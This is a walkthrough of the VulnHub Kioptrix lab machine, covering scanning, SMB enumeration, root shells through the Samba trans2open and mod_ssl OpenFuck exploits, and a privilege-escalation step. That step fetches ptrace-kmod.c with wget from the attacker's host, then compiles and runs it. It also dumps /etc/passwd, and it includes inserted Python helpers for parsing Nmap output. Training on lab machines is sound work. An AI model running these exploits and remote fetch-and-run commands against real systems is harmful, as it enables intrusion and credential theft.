Kioptrix is a vulnerable machine from VulnHub.
Setup #
Once we have downloaded the files from Vulnhub, we can import the virtual machine into either Virtual Box or VmWare.
The virtual machine should be configured to be on the same subnet as our attacker.
At this point, I suggest that you stop reading and take a crack at the box yourself if you haven’t already. If you get stuck at any point, use this guide as a hint.
Scanning and Enumeration #
In this setup the target is the only other machine on the network, so we can send a ping to the network’s broadcast address; every host on the segment receives it, and the machine that responds is the victim.
┌──(kali㉿kali)-[~/Documents/Kioptrix]
└─$ ping 10.0.2.255 -b
WARNING: pinging broadcast address
PING 10.0.2.255 (10.0.2.255) 56(84) bytes of data.
64 bytes from 10.0.2.4: icmp_seq=1 ttl=255 time=1.80 ms
64 bytes from 10.0.2.4: icmp_seq=2 ttl=255 time=1.78 ms
64 bytes from 10.0.2.4: icmp_seq=3 ttl=255 time=1.71 ms
64 bytes from 10.0.2.4: icmp_seq=4 ttl=255 time=1.34 ms
64 bytes from 10.0.2.4: icmp_seq=5 ttl=255 time=0.753 ms
64 bytes from 10.0.2.4: icmp_seq=6 ttl=255 time=1.74 ms
64 bytes from 10.0.2.4: icmp_seq=7 ttl=255 time=1.34 ms
From the above, we can clearly see that in my case the target is at 10.0.2.4.
Now that we have the target’s IP address, we can jot it down in our notes and start running scans to see what services the target is running and on which ports.
Running an Nmap scan gives us a good insight into what is running on the host. For simplicity’s sake some of the lines have been removed or shortened.
┌──(kali㉿kali)-[~/Documents/Kioptrix]
└─$ nmap -sS -A -p- -T4 -oA nmap/scan_report 10.0.2.4
# Nmap 7.94 scan initiated Sat Aug 5 15:57:56 2023 as: nmap -sS -A -p- -T4 -oA nmap/scan_report 10.0.2.4
Nmap scan report for 10.0.2.4
Host is up (0.0011s latency).
Scanned at 2023-08-05 15:58:10 IST for 34s
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 [SHORTENED]
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAA[SHORTENED]
| 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvv8UUWsrO7+VCG/rTWY72jElft[SHORTENED]
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
| Supported Methods: GET HEAD OPTIONS TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32770/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_ssl-date: 2023-08-05T19:58:48+00:00; +9h30m04s from scanner time.
| http-methods:
|_ Supported Methods: GET HEAD POST
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-09-26T09:32:06
| Not valid after: 2010-09-26T09:32:06
| MD5: 78ce:5293:4723:e7fe:c28d:74ab:42d7:02f1
| SHA-1: 9c42:91c3:bed2:a95b:983d:10ac:f766:ecb9:8766:1d33
| -----BEGIN CERTIFICATE-----
[REMOVED]
|_-----END CERTIFICATE-----
|_http-title: 400 Bad Request
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_WITH_MD5
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open status 1 (RPC #100024)
MAC Address: 00:50:56:3C:7A:ED (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.009 days (since Sat Aug 5 15:45:04 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=193 (Good luck!)
IP ID Sequence Generation: All zeros
Host script results:
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 10637/tcp): CLEAN (Couldn't connect)
| Check 2 (port 50108/tcp): CLEAN (Couldn't connect)
| Check 3 (port 20871/udp): CLEAN (Failed to receive data)
| Check 4 (port 43005/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KIOPTRIX<00> Flags: <unique><active>
| KIOPTRIX<03> Flags: <unique><active>
| KIOPTRIX<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MYGROUP<00> Flags: <group><active>
| MYGROUP<1d> Flags: <unique><active>
| MYGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_clock-skew: 9h30m03s
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 1.06 ms 10.0.2.4
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 5 15:58:44 2023 -- 1 IP address (1 host up) scanned in 48.35 seconds
I’ve gone ahead and highlighted most of the crucial information. Things like version numbers, ports and services belong in our notes.
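As an added example (not part of the original write-up), here is a small Python parser that turns an Nmap normal-output report like the one above into the kind of notes we want to keep: port, service and version per open port, with the risk flags the NSE scripts reported (SSHv1, TRACE, SSLv2) attached to the port they belong to. The sample report is a constructed excerpt that keeps the lines the scan actually showed.

```python
import re

# Constructed excerpt in the style of the Nmap normal-output report above,
# trimmed to the port lines and the script lines that matter for our notes.
SAMPLE_REPORT = """\
Nmap scan report for 10.0.2.4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_ Potentially risky methods: TRACE
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2:
| SSLv2 supported
32768/tcp open status 1 (RPC #100024)
"""

# "PORT STATE SERVICE VERSION" layout: port/proto, state, service, free-text version.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# NSE script output worth a note in the write-up, keyed by the substring Nmap prints.
RISK_MARKERS = {
    "Server supports SSHv1": "legacy SSHv1 enabled",
    "Potentially risky methods: TRACE": "HTTP TRACE enabled (cross-site tracing)",
    "SSLv2 supported": "SSLv2 enabled",
}


def parse_nmap_report(text):
    """Return one dict per port line, each carrying the risk notes found in the
    script output ('|' / '|_' lines) that follows that port."""
    findings = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current = {"port": int(port), "proto": proto, "state": state,
                       "service": service, "version": version or "", "notes": []}
            findings.append(current)
        elif current is not None and line.startswith("|"):
            # Script output always follows the port it was run against.
            for marker, note in RISK_MARKERS.items():
                if marker in line:
                    current["notes"].append(note)
    return findings


def notes_lines(findings):
    """Render the findings as the one-line-per-port notes we jot down."""
    out = []
    for f in findings:
        flags = f" [{'; '.join(f['notes'])}]" if f["notes"] else ""
        out.append(f"{f['port']}/{f['proto']} {f['service']} {f['version']}{flags}".rstrip())
    return out


if __name__ == "__main__":
    for line in notes_lines(parse_nmap_report(SAMPLE_REPORT)):
        print(line)
```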
Now that we have an idea of what is running on the target, we can start investigating more closely.
Since we have an HTTP/HTTPS server, we can start a nikto scan along with feroxbuster.
┌──(kali㉿kali)-[~/Documents/Kioptrix]
└─$ nikto -h 10.0.2.4
For feroxbuster we will need to provide a wordlist of directories to search; luckily Kali comes with wordlists located at /usr/share/wordlists/dirbuster/.
┌──(kali㉿kali)-[~/Documents/Kioptrix]
└─$ feroxbuster -u http://10.0.2.4/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Now these scans should take a while, so in the meantime we can do a little manual enumeration by checking out the web pages through the browser.
Navigating to the site we can see a default Apache install page. This could potentially lead to a vulnerability due to the default Apache configuration, and should be noted.
The Nmap scan also revealed that our host has SMB installed, however it didn’t give us any information on the version. We can make use of the Metasploit smb_version module to find the SMB version.
msf6 auxiliary(scanner/smb/smb_version) > exploit
[*] 10.0.2.4:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 10.0.2.4:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 10.0.2.4: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We can also check if there are any file shares we can access without proper credentials by attempting an anonymous login with smbclient.
-L is used to list the shares.
┌──(kali㉿kali)-[~]
└─$ smbclient -L \\\\10.0.2.4\\\\
Server does not support EXTENDED_SECURITY but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
Anonymous login successful
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
IPC$ IPC IPC Service (Samba Server)
ADMIN$ IPC IPC Service (Samba Server)
Reconnecting with SMB1 for workgroup listing.
Server does not support EXTENDED_SECURITY but 'client use spnego = yes' and 'client ntlmv2 auth = yes' is set
Anonymous login successful
Server Comment
--------- -------
KIOPTRIX Samba Server
Workgroup Master
--------- -------
MYGROUP KIOPTRIX
So, it looks like there is one share, ADMIN$ (we can generally ignore IPC$). Trying to connect to the admin share fails; however, it is important to note its existence, as there might be something to look at during post-exploitation or even during the exploitation stage.
Let’s take a look at the results of our HTTP server scans. Personally, the feroxbuster scan didn’t reveal that much due to some bugs; however, nikto revealed a lot of information.
$ nikto -h 10.0.2.4
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.0.2.4
+ Target Hostname: 10.0.2.4
+ Target Port: 80
+ Start Time: 2023-08-06 12:00:58 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ /: Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 08:42:46 2001. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Apache is vulnerable to XSS via the Expect header. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918
+ OpenSSL/0.9.6b appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.9.6) (may depend on server version).
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution.
+ Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system.
+ Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0835
+ /manual/: Directory indexing found.
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 19 error(s) and 18 item(s) reported on remote host
+ End Time: 2023-08-06 12:07:50 (GMT5.5) (412 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
This scan reveals quite a few attack vectors.
- The remote buffer overflow leading to a remote shell
- Reading /etc/shadow and cracking hashes
Now I wanted to have the second option running in the background while I looked for other ways to gain access. However, when I tried to access ///etc/hosts like Nikto did, I got a 404 error.
After a little bit of googling along the lines of “nikto ///etc/hosts”, I stumbled on this GitHub issue: https://github.com/sullo/nikto/issues/497.
It seems that since the box returns web pages with 127.0.0.1 at the bottom, nikto assumes this is part of the hosts file and reports a false positive.
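The Nikto issue above comes down to a heuristic: any response containing 127.0.0.1 is treated as a leaked hosts file. As an added example (not from the write-up or from Nikto’s own code), here is a small Python triage helper that compares the flagged response with the baseline page and requires the actual structure of a hosts file before accepting the finding. The response bodies are constructed to mirror the behaviour described above.

```python
import re

# Constructed responses modelled on the behaviour described in the Nikto issue:
# the default page ends with "127.0.0.1", and the server serves that same page
# for the "///etc/hosts" request, so a substring check reports a file-read.
BASELINE_BODY = ("<html><body>Test Page for the Apache Web Server\n"
                 "127.0.0.1\n</body></html>")
SAME_PAGE_BODY = BASELINE_BODY
# Constructed body for what a genuine /etc/hosts read would look like.
REAL_HOSTS_BODY = "127.0.0.1\tlocalhost.localdomain localhost\n10.0.2.4\tkioptrix\n"

# One hosts-file entry: an IPv4 or IPv6 address followed by at least one hostname.
HOSTS_ENTRY = re.compile(r"^\s*(?:\d{1,3}(?:\.\d{1,3}){3}|[0-9A-Fa-f:]+)\s+\S+")


def naive_hosts_check(body):
    """Nikto-style heuristic: any '127.0.0.1' in the response counts as a hit."""
    return "127.0.0.1" in body


def looks_like_hosts_file(body):
    """Require hosts-file structure: no HTML, and every non-blank,
    non-comment line is an '<address> <hostname>' entry."""
    if "<html" in body.lower():
        return False
    lines = [l for l in body.splitlines()
             if l.strip() and not l.lstrip().startswith("#")]
    if not lines:
        return False
    return all(HOSTS_ENTRY.match(l) for l in lines)


def triage_hosts_finding(baseline_body, candidate_body):
    """Classify a scanner '///etc/hosts readable' finding.
    Returns 'false_positive', 'confirmed' or 'inconclusive'."""
    if candidate_body == baseline_body:
        return "false_positive"   # the server just served the default page again
    if looks_like_hosts_file(candidate_body):
        return "confirmed"
    return "inconclusive"         # different body, but not a hosts file either


if __name__ == "__main__":
    print("naive check:", naive_hosts_check(SAME_PAGE_BODY))
    print("triage:", triage_hosts_finding(BASELINE_BODY, SAME_PAGE_BODY))
```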
Research #
At this point, it looks like our only option is the remote buffer overflow in mod_ssl (https://www.exploit-db.com/exploits/47080); however, we still have to check on the other outdated services (Apache, Samba).
Looking for vulnerabilities in Apache was pretty lackluster for me, though Samba delivered this: https://www.exploit-db.com/exploits/16861
Now this is wonderful: an exploit from Metasploit.
Exploitation #
We have identified two possible remote code execution attack vectors.
Samba Vulnerability #
The exploit we are looking for is /exploit/linux/samba/trans2open. I had some trouble getting a staged payload to work, so I went with the unstaged reverse TCP payload (set payload /payload/...).
msf6 exploit(linux/samba/trans2open) > exploit
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] 10.0.2.4:139 - Trying return address 0xbffffdfc...
[*] 10.0.2.4:139 - Trying return address 0xbffffcfc...
[*] 10.0.2.4:139 - Trying return address 0xbffffbfc...
[*] 10.0.2.4:139 - Trying return address 0xbffffafc...
[*] 10.0.2.4:139 - Trying return address 0xbffff9fc...
[*] 10.0.2.4:139 - Trying return address 0xbffff8fc...
[*] 10.0.2.4:139 - Trying return address 0xbffff7fc...
[*] 10.0.2.4:139 - Trying return address 0xbffff6fc...
[*] Command shell session 1 opened (10.0.2.15:4444 -> 10.0.2.4:32782) at 2023-08-11 10:42:02 -0400
whoami
root
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/dev/null
rpm:x:37:37::/var/lib/rpm:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
squid:x:23:23::/var/spool/squid:/dev/null
pcap:x:77:77::/var/arpwatch:/bin/nologin
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash
mod_ssl #
Unlike the Samba vulnerability, mod_ssl requires a bit more work. We can either download the source code from the Exploit Database link above, or we can use searchsploit:
searchsploit -p 47080
This should return the path to the source code on our system. Once we make a copy in our current directory, we can look inside for hints on how to get it operational.
/*
* OF version r00t VERY PRIV8 spabam
* Version: v3.0.4
* Requirements: libssl-dev ( apt-get install libssl-dev )
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
* Note: if required, host ptrace and replace wget target
*/
According to the comments, all we need to do is apt install libssl-dev, then compile the source code with gcc -o OpenLuck <filename> -lcrypto.
The installation and compilation goes pretty smoothly. Once that is complete, we can run the binary with no flags or options to get an idea of the syntax.
One of the parameters is the target; it depends on which Linux and Apache version the box runs.
Our box has two possible choices:
- “RedHat Linux 7.2 (apache-1.3.20-16)1”: 0x6a
- “RedHat Linux 7.2 (apache-1.3.20-16)2”: 0x6b
Using the first option didn’t seem to work for me so 0x6b it is 😃.
┌──(kali㉿kali)-[~/Documents/Kioptrix]
└─$ ./OpenLuck 0x6b 10.0.2.4 443 -c 46
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 46 of 46
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--14:46:25-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443...
dl.packetstormsecurity.net: Host not found.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
bash-2.05$ wget http://10.0.2.15:8000/ptrace-kmod.c
wget http://10.0.2.15:8000/ptrace-kmod.c
--14:48:20-- http://10.0.2.15:8000/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 10.0.2.15:8000... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 1.87 MB/s
14:48:20 (957.28 KB/s) - `ptrace-kmod.c' saved [3921/3921]
bash-2.05$ gcc -o exploit ptrace-kmod.c -B /usr/bin/bash
gcc -o exploit ptrace-kmod.c -B /usr/bin/bash
gcc: file path prefix `/usr/bin/bash' never used
bash-2.05$ ./exploit
./exploit
[+] Attached to 1166
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/dev/null
rpm:x:37:37::/var/lib/rpm:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
squid:x:23:23::/var/spool/squid:/dev/null
pcap:x:77:77::/var/arpwatch:/bin/nologin
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash
You might have seen that initially I didn’t have root access; the mod_ssl exploit usually gets root using a separate ptrace-kmod exploit, however since the host box wasn’t connected to the internet the file couldn’t be downloaded.
This meant I had to host the file on Kali with Python (python3 -m http.server) and download it from the host.
Once downloaded, it was as simple as compiling and running the file to gain root access.
Post Exploitation #
At this point, I haven’t really learned much about the post-exploitation phase; however, an idea I had would be to grab the /etc/shadow file and spend time cracking the hashes, so next time we might not have to go through the whole exploitation phase.